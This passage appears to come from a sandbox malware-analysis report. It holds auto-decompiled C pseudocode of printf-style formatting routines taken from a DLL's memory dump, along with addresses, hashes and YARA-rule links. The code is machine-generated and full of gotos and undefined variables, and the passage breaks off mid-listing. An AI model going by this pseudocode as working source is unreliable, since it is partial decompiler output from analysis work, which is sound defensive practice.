				void* _v40;
				signed int _v48;
				short _v52;
				short _v56;
				long long _v72;
				void* __rdi;
				signed int _t74;
				void* _t76;
				void* _t118;
				unsigned int _t119;
				signed short _t120;
				unsigned int _t121;
				signed char _t128;
				void* _t133;
				void* _t138;
				void* _t139;
				void* _t140;
				signed long long _t180;
				signed short* _t184;
				signed short* _t186;
				signed short* _t187;
				void* _t195;
				void* _t197;
				signed long long _t198;
				intOrPtr* _t204;
				void* _t206;
				signed long long _t207;
				void* _t213;
				signed long long _t216;

				_t203 = __rbp;
				_t201 = __rsi;
				_t186 = __rcx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t207 = _t206 - 0x40;
				_t180 =  *0x8005d010; // 0xb03f6156e10
				_v48 = _t180 ^ _t207;
				_t74 =  *(__rcx + 0x42) & 0x0000ffff;
				_t184 = __rcx;
				_t6 = _t201 - 0x17; // 0x41
				_t139 = _t6;
				_t7 = _t201 - 0x57; // 0x1
				r15d = _t7;
				_t140 = _t74 - 0x64;
				if (_t140 > 0) goto 0x8002039a;
				if (_t140 == 0) goto 0x8002040b;
				if (_t74 == _t139) goto 0x8002041e;
				if (_t74 == 0x43) goto 0x80020384;
				if (_t74 - 0x44 <= 0) goto 0x80020427;
				if (_t74 - 0x47 <= 0) goto 0x8002041e;
				if (_t74 == 0x53) goto 0x800203c7;
				if (_t74 == 0x58) goto 0x800203dc;
				if (_t74 == 0x5a) goto 0x80020390;
				if (_t74 == 0x61) goto 0x8002041e;
				if (_t74 != 0x63) goto 0x80020427;
				E00000001180023650(__rcx, __rcx, __rsi);
				goto 0x80020423;
				_t76 = E00000001180021254(_t118, __rcx, __rcx, _t201);
				goto 0x80020423;
				if (_t76 - 0x67 <= 0) goto 0x8002041e;
				if (_t76 == 0x69) goto 0x8002040b;
				if (_t76 == 0x6e) goto 0x80020404;
				if (_t76 == 0x6f) goto 0x800203e6;
				if (_t76 == 0x70) goto 0x800203ce;
				if (_t76 == 0x73) goto 0x800203c7;
				if (_t76 == 0x75) goto 0x8002040f;
				if (_t76 != 0x78) goto 0x80020427;
				goto 0x80020414;
				E000000011800261EC(_t118, _t184, _t186, _t201);
				goto 0x80020423;
				 *((intOrPtr*)(_t186 + 0x38)) = 0x10;
				 *((intOrPtr*)(_t186 + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x80020417;
				_t119 =  *(_t186 + 0x30);
				if ((r15b & _t119 >> 0x00000005) == 0) goto 0x800203fa;
				asm("bts ecx, 0x7");
				 *(_t184 + 0x30) = _t119;
				_t187 = _t184;
				goto 0x80020414;
				E000000011800256A4(_t180 ^ _t207, _t184, _t187);
				goto 0x80020423;
				 *(_t187 + 0x30) =  *(_t187 + 0x30) | 0x00000010;
				r8d = 0;
				E000000011800249F0(0xa, _t184, _t187, _t195, _t201, __rbp, _t213);
				goto 0x80020423;
				if (E000000011800229B8(0xa, _t133, _t180 ^ _t207, _t184, _t187, _t197, _t201, _t203) != 0) goto 0x8002042e;
				goto 0x800205b0;
				if ( *((intOrPtr*)(_t184 + 0x47c)) != 2) goto 0x80020444;
				if ( *((intOrPtr*)(_t184 + 0x478)) == r15d) goto 0x800205ad;
				if ( *((char*)(_t184 + 0x40)) != 0) goto 0x800205ad;
				_t128 =  *(_t184 + 0x30);
				_v56 = 0;
				_v52 = 0;
				_t23 = _t197 + 0x20; // 0x20
				r13d = _t23;
				if ((r15b & 0) == 0) goto 0x8002049e;
				if ((r15b & 0) == 0) goto 0x80020480;
				_t28 = _t197 + 0x2d; // 0x2d
				_v56 = _t28;
				goto 0x8002049b;
				if ((r15b & _t128) == 0) goto 0x8002048c;
				goto 0x80020479;
				if ((r15b & 0) == 0) goto 0x8002049e;
				_v56 = r13w;
				_t198 = _t216;
				_t120 =  *(_t184 + 0x42) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t120 & 0x0000ffff) - 0x00000058) != 0) goto 0x800204c3;
				if ((r15b & 0) == 0) goto 0x800204c3;
				r8b = r15b;
				goto 0x800204c6;
				r8b = 0;
				r12d = 0x30;
				if (r8b != 0) goto 0x800204e2;
				if (0 == 0) goto 0x80020511;
				 *((intOrPtr*)(_t207 + 0x30 + _t198 * 2)) = r12w;
				if (_t120 == 0x58) goto 0x800204f9;
				if (_t120 == _t139) goto 0x800204f9;
				goto 0x800204fc;
				asm("sbb al, al");
				 *((short*)(_t207 + 0x30 + (_t198 + _t216) * 2)) = ( ~r15b & 0x000000e0) + 0x78;
				_t138 =  *((intOrPtr*)(_t184 + 0x34)) -  *((intOrPtr*)(_t184 + 0x50));
				if ((_t128 & 0x0000000c) != 0) goto 0x80020534;
				r8d = _t138;
				E000000011800177DC(( ~r15b & 0x000000e0) + 0x78, r13b, _t184, _t184 + 0x468, _t198 + _t216 + _t216, _t184 + 0x28);
				_t204 = _t184 + 0x28;
				_v72 =  *((intOrPtr*)(_t184 + 0x10));
				r8d = 0;
				E00000001180028B1C(_t139, _t184, _t184 + 0x468, _t201, _t204, _t204);
				_t121 =  *(_t184 + 0x30);
				if ((r15b & _t121 >> 0x00000003) == 0) goto 0x80020581;
				if ((r15b & _t121 >> 0x00000002) != 0) goto 0x80020581;
				r8d = _t138;
				E000000011800177DC(_t121 >> 3, r12b, _t184, _t184 + 0x468, _t198 + _t216 + _t216, _t204);
				E0000000118002867C(_t184, _t184, _t201, _t204);
				if ( *_t204 < 0) goto 0x800205ad;
				if ((r15b &  *(_t184 + 0x30) >> 0x00000002) == 0) goto 0x800205ad;
				r8d = _t138;
				E000000011800177DC( *(_t184 + 0x30) >> 2, r13b, _t184, _t184 + 0x468, _t198 + _t216 + _t216, _t204);
				return E000000011800010E0(r15b, _t121 >> 2, _v48 ^ _t207);
			}
































                                                                                                    0x1800202fc
                                                                                                    0x1800202fc
                                                                                                    0x1800202fc
                                                                                                    0x1800202fc
                                                                                                    0x180020301
                                                                                                    0x180020306
                                                                                                    0x180020314
                                                                                                    0x180020318
                                                                                                    0x180020322
                                                                                                    0x180020327
                                                                                                    0x180020330
                                                                                                    0x180020333
                                                                                                    0x180020333
                                                                                                    0x180020336
                                                                                                    0x180020336
                                                                                                    0x18002033a
                                                                                                    0x18002033d
                                                                                                    0x18002033f
                                                                                                    0x180020347
                                                                                                    0x180020350
                                                                                                    0x180020355
                                                                                                    0x18002035e
                                                                                                    0x180020367
                                                                                                    0x18002036b
                                                                                                    0x180020370
                                                                                                    0x180020375
                                                                                                    0x18002037e
                                                                                                    0x180020386
                                                                                                    0x18002038b
                                                                                                    0x180020390
                                                                                                    0x180020395
                                                                                                    0x18002039d
                                                                                                    0x1800203a2
                                                                                                    0x1800203a7
                                                                                                    0x1800203ac
                                                                                                    0x1800203b1
                                                                                                    0x1800203b6
                                                                                                    0x1800203bb
                                                                                                    0x1800203c0
                                                                                                    0x1800203c5
                                                                                                    0x1800203c7
                                                                                                    0x1800203cc
                                                                                                    0x1800203ce
                                                                                                    0x1800203d5
                                                                                                    0x1800203dc
                                                                                                    0x1800203e4
                                                                                                    0x1800203e6
                                                                                                    0x1800203f1
                                                                                                    0x1800203f3
                                                                                                    0x1800203f7
                                                                                                    0x1800203ff
                                                                                                    0x180020402
                                                                                                    0x180020404
                                                                                                    0x180020409
                                                                                                    0x18002040b
                                                                                                    0x180020414
                                                                                                    0x180020417
                                                                                                    0x18002041c
                                                                                                    0x180020425
                                                                                                    0x180020429
                                                                                                    0x180020435
                                                                                                    0x18002043e
                                                                                                    0x180020448
                                                                                                    0x18002044e
                                                                                                    0x180020453
                                                                                                    0x180020459
                                                                                                    0x180020463
                                                                                                    0x180020463
                                                                                                    0x18002046a
                                                                                                    0x180020474
                                                                                                    0x180020476
                                                                                                    0x180020479
                                                                                                    0x18002047e
                                                                                                    0x180020483
                                                                                                    0x18002048a
                                                                                                    0x180020493
                                                                                                    0x180020495
                                                                                                    0x18002049b
                                                                                                    0x18002049e
                                                                                                    0x1800204a2
                                                                                                    0x1800204b2
                                                                                                    0x1800204bc
                                                                                                    0x1800204be
                                                                                                    0x1800204c1
                                                                                                    0x1800204c3
                                                                                                    0x1800204c9
                                                                                                    0x1800204dc
                                                                                                    0x1800204e0
                                                                                                    0x1800204e2
                                                                                                    0x1800204ee
                                                                                                    0x1800204f3
                                                                                                    0x1800204f7
                                                                                                    0x1800204fe
                                                                                                    0x180020509
                                                                                                    0x180020517
                                                                                                    0x18002051c
                                                                                                    0x180020522
                                                                                                    0x18002052f
                                                                                                    0x180020538
                                                                                                    0x180020543
                                                                                                    0x180020553
                                                                                                    0x180020556
                                                                                                    0x18002055b
                                                                                                    0x180020566
                                                                                                    0x18002056e
                                                                                                    0x180020573
                                                                                                    0x18002057c
                                                                                                    0x180020586
                                                                                                    0x18002058f
                                                                                                    0x18002059a
                                                                                                    0x18002059f
                                                                                                    0x1800205a8
                                                                                                    0x1800205da

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 0-4108050209
                                                                                                    • Opcode ID: 9faec33d2e1e47f6e0f6cfd166d45e96118e724bb54f1d40bfb51beddd572b43
                                                                                                    • Instruction ID: ff2622132cf9dc3e816829406d7614f068bc3639b4bca71cdcc5c7097e11ab09
                                                                                                    • Opcode Fuzzy Hash: 9faec33d2e1e47f6e0f6cfd166d45e96118e724bb54f1d40bfb51beddd572b43
                                                                                                    • Instruction Fuzzy Hash: AD81C2723107488AFAEBAA2590407EE23A0E7487C8F64D515FE0597A97CF35CB8ED700
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 000000018001FA84 Relevance: 1.5, Strings: 1, Instructions: 223COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 49%
                                                                                                    			E0000000118001FA84(long long __rbx, signed short* __rcx, void* __rdx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v48;
				short _v52;
				char _v56;
				long long _v72;
				void* __rdi;
				signed int _t74;
				void* _t76;
				void* _t118;
				unsigned int _t119;
				signed short _t120;
				unsigned int _t121;
				signed char _t128;
				void* _t133;
				void* _t138;
				void* _t139;
				void* _t140;
				signed long long _t180;
				signed short* _t184;
				signed short* _t186;
				signed short* _t187;
				void* _t195;
				void* _t197;
				signed long long _t198;
				intOrPtr* _t204;
				void* _t206;
				signed long long _t207;
				void* _t213;
				signed long long _t216;

				_t203 = __rbp;
				_t201 = __rsi;
				_t195 = __rdx;
				_t186 = __rcx;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t207 = _t206 - 0x40;
				_t180 =  *0x8005d010; // 0xb03f6156e10
				_v48 = _t180 ^ _t207;
				_t74 =  *(__rcx + 0x42) & 0x0000ffff;
				_t184 = __rcx;
				_t6 = _t201 - 0x17; // 0x41
				_t139 = _t6;
				_t7 = _t201 - 0x57; // 0x1
				r15d = _t7;
				_t140 = _t74 - 0x64;
				if (_t140 > 0) goto 0x8001fb22;
				if (_t140 == 0) goto 0x8001fb93;
				if (_t74 == _t139) goto 0x8001fba6;
				if (_t74 == 0x43) goto 0x8001fb0c;
				if (_t74 - 0x44 <= 0) goto 0x8001fbaf;
				if (_t74 - 0x47 <= 0) goto 0x8001fba6;
				if (_t74 == 0x53) goto 0x8001fb4f;
				if (_t74 == 0x58) goto 0x8001fb64;
				if (_t74 == 0x5a) goto 0x8001fb18;
				if (_t74 == 0x61) goto 0x8001fba6;
				if (_t74 != 0x63) goto 0x8001fbaf;
				E00000001180023434(__rcx, __rcx, __rsi);
				goto 0x8001fbab;
				_t76 = E000000011800210B4(_t118, __rcx, __rcx, _t201);
				goto 0x8001fbab;
				if (_t76 - 0x67 <= 0) goto 0x8001fba6;
				if (_t76 == 0x69) goto 0x8001fb93;
				if (_t76 == 0x6e) goto 0x8001fb8c;
				if (_t76 == 0x6f) goto 0x8001fb6e;
				if (_t76 == 0x70) goto 0x8001fb56;
				if (_t76 == 0x73) goto 0x8001fb4f;
				if (_t76 == 0x75) goto 0x8001fb97;
				if (_t76 != 0x78) goto 0x8001fbaf;
				goto 0x8001fb9c;
				E00000001180025F7C(_t118, _t184, _t186, _t201);
				goto 0x8001fbab;
				 *((intOrPtr*)(_t186 + 0x38)) = 0x10;
				 *((intOrPtr*)(_t186 + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8001fb9f;
				_t119 =  *(_t186 + 0x30);
				if ((r15b & _t119 >> 0x00000005) == 0) goto 0x8001fb82;
				asm("bts ecx, 0x7");
				 *(_t184 + 0x30) = _t119;
				_t187 = _t184;
				goto 0x8001fb9c;
				E000000011800253E8(_t180 ^ _t207, _t184, _t187);
				goto 0x8001fbab;
				 *(_t187 + 0x30) =  *(_t187 + 0x30) | 0x00000010;
				r8d = 0;
				E000000011800244AC(0xa, _t184, _t187, _t195, _t201, __rbp, _t213);
				goto 0x8001fbab;
				if (E000000011800222C0(0xa, _t133, _t180 ^ _t207, _t184, _t187, _t197, _t201, _t203) != 0) goto 0x8001fbb6;
				goto 0x8001fd38;
				if ( *((intOrPtr*)(_t184 + 0x47c)) != 2) goto 0x8001fbcc;
				if ( *((intOrPtr*)(_t184 + 0x478)) == r15d) goto 0x8001fd35;
				if ( *((char*)(_t184 + 0x40)) != 0) goto 0x8001fd35;
				_t128 =  *(_t184 + 0x30);
				_v56 = 0;
				_v52 = 0;
				_t23 = _t197 + 0x20; // 0x20
				r13d = _t23;
				if ((r15b & 0) == 0) goto 0x8001fc26;
				if ((r15b & 0) == 0) goto 0x8001fc08;
				_t28 = _t197 + 0x2d; // 0x2d
				_v56 = _t28;
				goto 0x8001fc23;
				if ((r15b & _t128) == 0) goto 0x8001fc14;
				goto 0x8001fc01;
				if ((r15b & 0) == 0) goto 0x8001fc26;
				_v56 = r13w;
				_t198 = _t216;
				_t120 =  *(_t184 + 0x42) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t120 & 0x0000ffff) - 0x00000058) != 0) goto 0x8001fc4b;
				if ((r15b & 0) == 0) goto 0x8001fc4b;
				r8b = r15b;
				goto 0x8001fc4e;
				r8b = 0;
				r12d = 0x30;
				if (r8b != 0) goto 0x8001fc6a;
				if (0 == 0) goto 0x8001fc99;
				 *((intOrPtr*)(_t207 + 0x30 + _t198 * 2)) = r12w;
				if (_t120 == 0x58) goto 0x8001fc81;
				if (_t120 == _t139) goto 0x8001fc81;
				goto 0x8001fc84;
				asm("sbb al, al");
				 *((short*)(_t207 + 0x30 + (_t198 + _t216) * 2)) = ( ~r15b & 0x000000e0) + 0x78;
				_t138 =  *((intOrPtr*)(_t184 + 0x34)) -  *((intOrPtr*)(_t184 + 0x50));
				if ((_t128 & 0x0000000c) != 0) goto 0x8001fcbc;
				r8d = _t138;
				E000000011800176F0(r13b, _t184, _t184 + 0x468, _t198 + _t216 + _t216, _t201, _t203, _t184 + 0x28);
				_t204 = _t184 + 0x28;
				_v72 =  *((intOrPtr*)(_t184 + 0x10));
				_t60 =  &_v56; // 0x60
				r8d = 0;
				E00000001180028954(_t184, _t184 + 0x468, _t60, _t201, _t204, _t204);
				_t121 =  *(_t184 + 0x30);
				if ((r15b & _t121 >> 0x00000003) == 0) goto 0x8001fd09;
				if ((r15b & _t121 >> 0x00000002) != 0) goto 0x8001fd09;
				r8d = _t138;
				E000000011800176F0(r12b, _t184, _t184 + 0x468, _t198 + _t216 + _t216, _t201, _t204, _t204);
				E000000011800283B4(_t184, _t184, _t204);
				if ( *_t204 < 0) goto 0x8001fd35;
				if ((r15b &  *(_t184 + 0x30) >> 0x00000002) == 0) goto 0x8001fd35;
				r8d = _t138;
				E000000011800176F0(r13b, _t184, _t184 + 0x468, _t198 + _t216 + _t216, _t201, _t204, _t204);
				return E000000011800010E0(r15b, _t121 >> 2, _v48 ^ _t207);
			}
































                                                                                                    0x18001fa84
                                                                                                    0x18001fa84
                                                                                                    0x18001fa84
                                                                                                    0x18001fa84
                                                                                                    0x18001fa84
                                                                                                    0x18001fa89
                                                                                                    0x18001fa8e
                                                                                                    0x18001fa9c
                                                                                                    0x18001faa0
                                                                                                    0x18001faaa
                                                                                                    0x18001faaf
                                                                                                    0x18001fab8
                                                                                                    0x18001fabb
                                                                                                    0x18001fabb
                                                                                                    0x18001fabe
                                                                                                    0x18001fabe
                                                                                                    0x18001fac2
                                                                                                    0x18001fac5
                                                                                                    0x18001fac7
                                                                                                    0x18001facf
                                                                                                    0x18001fad8
                                                                                                    0x18001fadd
                                                                                                    0x18001fae6
                                                                                                    0x18001faef
                                                                                                    0x18001faf3
                                                                                                    0x18001faf8
                                                                                                    0x18001fafd
                                                                                                    0x18001fb06
                                                                                                    0x18001fb0e
                                                                                                    0x18001fb13
                                                                                                    0x18001fb18
                                                                                                    0x18001fb1d
                                                                                                    0x18001fb25
                                                                                                    0x18001fb2a
                                                                                                    0x18001fb2f
                                                                                                    0x18001fb34
                                                                                                    0x18001fb39
                                                                                                    0x18001fb3e
                                                                                                    0x18001fb43
                                                                                                    0x18001fb48
                                                                                                    0x18001fb4d
                                                                                                    0x18001fb4f
                                                                                                    0x18001fb54
                                                                                                    0x18001fb56
                                                                                                    0x18001fb5d
                                                                                                    0x18001fb64
                                                                                                    0x18001fb6c
                                                                                                    0x18001fb6e
                                                                                                    0x18001fb79
                                                                                                    0x18001fb7b
                                                                                                    0x18001fb7f
                                                                                                    0x18001fb87
                                                                                                    0x18001fb8a
                                                                                                    0x18001fb8c
                                                                                                    0x18001fb91
                                                                                                    0x18001fb93
                                                                                                    0x18001fb9c
                                                                                                    0x18001fb9f
                                                                                                    0x18001fba4
                                                                                                    0x18001fbad
                                                                                                    0x18001fbb1
                                                                                                    0x18001fbbd
                                                                                                    0x18001fbc6
                                                                                                    0x18001fbd0
                                                                                                    0x18001fbd6
                                                                                                    0x18001fbdb
                                                                                                    0x18001fbe1
                                                                                                    0x18001fbeb
                                                                                                    0x18001fbeb
                                                                                                    0x18001fbf2
                                                                                                    0x18001fbfc
                                                                                                    0x18001fbfe
                                                                                                    0x18001fc01
                                                                                                    0x18001fc06
                                                                                                    0x18001fc0b
                                                                                                    0x18001fc12
                                                                                                    0x18001fc1b
                                                                                                    0x18001fc1d
                                                                                                    0x18001fc23
                                                                                                    0x18001fc26
                                                                                                    0x18001fc2a
                                                                                                    0x18001fc3a
                                                                                                    0x18001fc44
                                                                                                    0x18001fc46
                                                                                                    0x18001fc49
                                                                                                    0x18001fc4b
                                                                                                    0x18001fc51
                                                                                                    0x18001fc64
                                                                                                    0x18001fc68
                                                                                                    0x18001fc6a
                                                                                                    0x18001fc76
                                                                                                    0x18001fc7b
                                                                                                    0x18001fc7f
                                                                                                    0x18001fc86
                                                                                                    0x18001fc91
                                                                                                    0x18001fc9f
                                                                                                    0x18001fca4
                                                                                                    0x18001fcaa
                                                                                                    0x18001fcb7
                                                                                                    0x18001fcc0
                                                                                                    0x18001fccb
                                                                                                    0x18001fcd3
                                                                                                    0x18001fcdb
                                                                                                    0x18001fcde
                                                                                                    0x18001fce3
                                                                                                    0x18001fcee
                                                                                                    0x18001fcf6
                                                                                                    0x18001fcfb
                                                                                                    0x18001fd04
                                                                                                    0x18001fd0e
                                                                                                    0x18001fd17
                                                                                                    0x18001fd22
                                                                                                    0x18001fd27
                                                                                                    0x18001fd30
                                                                                                    0x18001fd62

                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 0000000E.00000002.374193232.0000000180001000.00000020.00000001.01000000.0000000A.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                    • Associated: 0000000E.00000002.374175797.0000000180000000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374302852.000000018004A000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374332530.000000018005D000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    • Associated: 0000000E.00000002.374346154.0000000180060000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_14_2_180000000_regsvr32.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: 0
                                                                                                    • API String ID: 0-4108050209
                                                                                                    • Opcode ID: db92f8191339d97b13cb4588c97b7708ba98beb744d47ee2f333a85c4eadc77f
                                                                                                    • Instruction ID: 85aa526ff908a8d95d483f6a4796cc90a34a78bf7ec11c19786d6ffbcedc442b
                                                                                                    • Opcode Fuzzy Hash: db92f8191339d97b13cb4588c97b7708ba98beb744d47ee2f333a85c4eadc77f
                                                                                                    • Instruction Fuzzy Hash: 5C81E172214A4C86EBFA8A25D1907FE23A1E74CBC8F549912FE0287795CF25CA4ED741
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 0000000180020030 Relevance: 1.5, Strings: 1, Instructions: 219COMMONCrypto
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 57%
                                                                                                    			E00000001180020030(long long __rbx, long long __rcx, long long __rsi, long long __rbp, long long _a16, long long _a24, long long _a32) {
				void* _v40;
				signed int _v48;
				short _v52;
				short _v56;
				long long _v72;
				void* __rdi;
				signed int _t72;
				void* _t74;
				void* _t116;
				unsigned int _t117;
				signed short _t118;
				unsigned int _t119;
				signed char _t126;
				void* _t131;
				void* _t136;
				void* _t137;
				void* _t138;
				signed long long _t176;
				void* _t191;
				void* _t193;
				signed long long _t194;
				intOrPtr* _t200;
				void* _t202;
				signed long long _t203;
				void* _t205;
				void* _t210;
				signed long long _t213;

				_t197 = __rsi;
				_a16 = __rbx;
				_a24 = __rbp;
				_a32 = __rsi;
				_t203 = _t202 - 0x40;
				_t176 =  *0x8005d010; // 0xb03f6156e10
				_v48 = _t176 ^ _t203;
				_t72 =  *(__rcx + 0x42) & 0x0000ffff;
				_t6 = _t197 - 0x17; // 0x41
				_t137 = _t6;
				_t7 = _t197 - 0x57; // 0x1
				r15d = _t7;
				_t138 = _t72 - 0x64;
				if (_t138 > 0) goto 0x800200ce;
				if (_t138 == 0) goto 0x8002013f;
				if (_t72 == _t137) goto 0x80020152;
				if (_t72 == 0x43) goto 0x800200b8;
				if (_t72 - 0x44 <= 0) goto 0x8002015b;
				if (_t72 - 0x47 <= 0) goto 0x80020152;
				if (_t72 == 0x53) goto 0x800200fb;
				if (_t72 == 0x58) goto 0x80020110;
				if (_t72 == 0x5a) goto 0x800200c4;
				if (_t72 == 0x61) goto 0x80020152;
				if (_t72 != 0x63) goto 0x8002015b;
				E000000011800235A8(_t72 - 0x63, __rcx, __rcx, __rsi);
				goto 0x80020157;
				_t74 = E000000011800211D4(__rcx, __rcx, _t197);
				goto 0x80020157;
				if (_t74 - 0x67 <= 0) goto 0x80020152;
				if (_t74 == 0x69) goto 0x8002013f;
				if (_t74 == 0x6e) goto 0x80020138;
				if (_t74 == 0x6f) goto 0x8002011a;
				if (_t74 == 0x70) goto 0x80020102;
				if (_t74 == 0x73) goto 0x800200fb;
				if (_t74 == 0x75) goto 0x80020143;
				if (_t74 != 0x78) goto 0x8002015b;
				goto 0x80020148;
				E00000001180026124(_t116, __rcx, __rcx, _t197);
				goto 0x80020157;
				 *((intOrPtr*)(__rcx + 0x38)) = 0x10;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0xb;
				r8b = r15b;
				goto 0x8002014b;
				_t117 =  *(__rcx + 0x30);
				if ((r15b & _t117 >> 0x00000005) == 0) goto 0x8002012e;
				asm("bts ecx, 0x7");
				 *(__rcx + 0x30) = _t117;
				goto 0x80020148;
				E000000011800255C8(__rcx, __rcx, _t191, _t197);
				goto 0x80020157;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000010;
				r8d = 0;
				E00000001180024850(0xa, __rcx, _t205, _t210);
				goto 0x80020157;
				if (E00000001180022774(_t131, _t176 ^ _t203, __rcx, __rcx, _t193, _t197, __rbp, _t205) != 0) goto 0x80020162;
				goto 0x800202ce;
				if ( *((char*)(__rcx + 0x40)) != 0) goto 0x800202cb;
				_t126 =  *(__rcx + 0x30);
				_v56 = 0;
				_v52 = 0;
				_t21 = _t193 + 0x20; // 0x20
				r13d = _t21;
				if ((r15b & 0) == 0) goto 0x800201bc;
				if ((r15b & 0) == 0) goto 0x8002019e;
				_t26 = _t193 + 0x2d; // 0x2d
				_v56 = _t26;
				goto 0x800201b9;
				if ((r15b & _t126) == 0) goto 0x800201aa;
				goto 0x80020197;
				if ((r15b & 0) == 0) goto 0x800201bc;
				_v56 = r13w;
				_t194 = _t213;
				_t118 =  *(__rcx + 0x42) & 0x0000ffff;
				r9d = 0xffdf;
				if ((r9w & (_t118 & 0x0000ffff) - 0x00000058) != 0) goto 0x800201e1;
				if ((r15b & 0) == 0) goto 0x800201e1;
				r8b = r15b;
				goto 0x800201e4;
				r8b = 0;
				r12d = 0x30;
				if (r8b != 0) goto 0x80020200;
				if (0 == 0) goto 0x8002022f;
				 *((intOrPtr*)(_t203 + 0x30 + _t194 * 2)) = r12w;
				if (_t118 == 0x58) goto 0x80020217;
				if (_t118 == _t137) goto 0x80020217;
				goto 0x8002021a;
				asm("sbb al, al");
				 *((short*)(_t203 + 0x30 + (_t194 + _t213) * 2)) = ( ~r15b & 0x000000e0) + 0x78;
				_t136 =  *((intOrPtr*)(__rcx + 0x34)) -  *((intOrPtr*)(__rcx + 0x50));
				if ((_t126 & 0x0000000c) != 0) goto 0x80020252;
				r8d = _t136;
				E000000011800177DC(( ~r15b & 0x000000e0) + 0x78, r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, __rcx + 0x28);
				_t200 = __rcx + 0x28;
				_v72 =  *((intOrPtr*)(__rcx + 0x10));
				r8d = 0;
				E00000001180028B1C(_t137, __rcx, __rcx + 0x468, _t197, _t200, _t200);
				_t119 =  *(__rcx + 0x30);
				if ((r15b & _t119 >> 0x00000003) == 0) goto 0x8002029f;
				if ((r15b & _t119 >> 0x00000002) != 0) goto 0x8002029f;
				r8d = _t136;
				E000000011800177DC(_t119 >> 3, r12b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t200);
				E0000000118002858C(__rcx, __rcx, _t197, _t200);
				if ( *_t200 < 0) goto 0x800202cb;
				if ((r15b &  *(__rcx + 0x30) >> 0x00000002) == 0) goto 0x800202cb;
				r8d = _t136;
				E000000011800177DC( *(__rcx + 0x30) >> 2, r13b, __rcx, __rcx + 0x468, _t194 + _t213 + _t213, _t200);
				return E000000011800010E0(r15b, _t119 >> 2, _v48 ^ _t203);
			}






























                                                                                                    0x180020030
                                                                                                    0x180020030
                                                                                                    0x180020035
                                                                                                    0x18002003a
                                                                                                    0x180020048
                                                                                                    0x18002004c
                                                                                                    0x180020056
                                                                                                    0x18002005b
                                                                                                    0x180020067
                                                                                                    0x180020067
                                                                                                    0x18002006a
                                                                                                    0x18002006a
                                                                                                    0x18002006e
                                                                                                    0x180020071
                                                                                                    0x180020073
                                                                                                    0x18002007b
                                                                                                    0x180020084
                                                                                                    0x180020089
                                                                                                    0x180020092
                                                                                                    0x18002009b
                                                                                                    0x18002009f
                                                                                                    0x1800200a4
                                                                                                    0x1800200a9
                                                                                                    0x1800200b2
                                                                                                    0x1800200ba
                                                                                                    0x1800200bf
                                                                                                    0x1800200c4
                                                                                                    0x1800200c9
                                                                                                    0x1800200d1
                                                                                                    0x1800200d6
                                                                                                    0x1800200db
                                                                                                    0x1800200e0
                                                                                                    0x1800200e5
                                                                                                    0x1800200ea
                                                                                                    0x1800200ef
                                                                                                    0x1800200f4
                                                                                                    0x1800200f9
                                                                                                    0x1800200fb
                                                                                                    0x180020100
                                                                                                    0x180020102
                                                                                                    0x180020109
                                                                                                    0x180020110
                                                                                                    0x180020118
                                                                                                    0x18002011a
                                                                                                    0x180020125
                                                                                                    0x180020127
                                                                                                    0x18002012b
                                                                                                    0x180020136
                                                                                                    0x180020138
                                                                                                    0x18002013d
                                                                                                    0x18002013f
                                                                                                    0x180020148
                                                                                                    0x18002014b
                                                                                                    0x180020150
                                                                                                    0x180020159
                                                                                                    0x18002015d
                                                                                                    0x180020166
                                                                                                    0x18002016c
                                                                                                    0x180020171
                                                                                                    0x180020177
                                                                                                    0x180020181
                                                                                                    0x180020181
                                                                                                    0x180020188
                                                                                                    0x180020192
                                                                                                    0x180020194
                                                                                                    0x180020197
                                                                                                    0x18002019c
                                                                                                    0x1800201a1
                                                                                                    0x1800201a8
                                                                                                    0x1800201b1
                                                                                                    0x1800201b3
                                                                                                    0x1800201b9
                                                                                                    0x1800201bc
                                                                                                    0x1800201c0
                                                                                                    0x1800201d0
                                                                                                    0x1800201da
                                                                                                    0x1800201dc
                                                                                                    0x1800201df
                                                                                                    0x1800201e1
                                                                                                    0x1800201e7
                                                                                                    0x1800201fa
                                                                                                    0x1800201fe
                                                                                                    0x180020200
                                                                                                    0x18002020c
                                                                                                    0x180020211
                                                                                                    0x180020215
                                                                                                    0x18002021c
